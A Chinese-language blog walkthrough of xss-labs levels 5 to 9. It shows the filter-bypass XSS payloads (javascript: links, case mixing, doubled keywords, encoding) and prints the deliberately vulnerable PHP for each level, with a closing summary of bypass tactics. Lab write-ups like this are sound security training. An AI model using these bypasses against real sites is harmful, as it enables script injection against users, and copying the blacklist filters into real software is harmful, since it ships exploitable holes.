xss-labs靶场训练(5-9关)

第五关

先试一下经典的payload:
在这里插入图片描述
这里把script过滤了
在这里插入图片描述
onclick也被过滤了
在这里插入图片描述
onmouseover也同样被过滤了,尝试用<a>标签执行javascript:伪协议。
Payload:

><a href=javascript:alert()>xss</a>`

在这里插入图片描述
点击一下搜索按钮左侧的xss就成功弹窗了
在这里插入图片描述
后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

这里用了主要用了strtolower函数把所有字符转换为小写,加上str_replace函数把script和on替换掉。所以包含script、onclick、onmouseover的payload都不能用了。

第六关

尝试第五关的方法:
在这里插入图片描述
这里把href也替换掉了,那就用img试试看吧
在这里插入图片描述
src也被替换掉了,感觉这些字符都被替换了,只能尝试一下大小写绕过了
payload:

><a Href=javascript:alert()>xss</a>

在这里插入图片描述
成功绕过

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

这里把script、on、src、data、href都过滤掉了,但没有像第五关那样把字母都转化成小写,所以大小写可以成功绕过。

第七关

老规矩,先用上一关的payload做试探
在这里插入图片描述
这里直接把hrefscript替换成空字符了,而且把我的大写字母转化成小写了。试一下双写绕过:

><a hrhrefef=javascrscriptipt:alert()>xss</a>

在这里插入图片描述
成功绕过

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

这里把字母都转化成小写,而且把script、on、src、data、href都替换成空字符了,利用关键字双写能成功绕过。

第八关

先用上一关的payload测试
在这里插入图片描述
这里没有把关键字替换成空字符,所以不用双写,把payload换成:javascript:alert(xss)
在这里插入图片描述
还是对关键字做了替换,而且大小写转换失败。

尝试一下编码绕过:
在这里插入图片描述
在这里插入图片描述
成功绕过
在这里插入图片描述

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

这里把script、on、src、data、href都过滤掉了,而且把字母都转化成小写,所以大小写绕过无效了。但利用编码绕过可以成功弹窗。

第九关

先试一下上一关的payload:javascript:alert()
在这里插入图片描述
直接识别我的链接不合法了,估计是URL格式不合法,尝试把http://添加进payload:
在这里插入图片描述
成功绕过

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

这里在对关键字符过滤以及把字符转化成小写的情况下,加多了一个strpos函数,用来判断链接是否包含http://

strpos函数实例:
在这里插入图片描述

总结

  • 某些关键字被过滤时,可以考虑构造其他payload。
  • 大部分关键字都被过滤时,考虑用大小写关键字绕过。
  • 关键字被过滤而且字符都被转换成小写字母时,考虑用编码绕过。
  • 关键字被替换成空字符时,考虑用双写关键字绕过。
  • 输入的payload被判断是否有某些字符时,考虑以注释的形式添加到payload。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值